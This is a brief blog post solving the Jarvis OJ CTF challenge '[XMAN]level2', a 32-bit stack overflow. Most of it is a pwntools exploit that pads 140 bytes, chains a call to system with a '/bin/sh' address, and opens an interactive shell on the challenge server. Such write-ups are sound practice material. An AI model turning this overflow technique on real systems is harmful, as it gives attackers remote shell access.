[XMAN]level2

nc pwn2.jarvisoj.com 9878

 



level2.54931449c557d0551c4fc2a10f4778a1

 

32位栈溢出

exp如下:

from pwn import *

#io = process('./level2')
io = remote('pwn2.jarvisoj.com', 9878)

io.recvuntil('Input:\n')
payload = b'a' * 140 + p32(0x8048320) + p32(0x8048320) + p32(0x804A024)
io.send(payload)

io.interactive()

 

posted @ 2021-07-17 14:41  hktk1643  阅读(25)  评论(0编辑  收藏  举报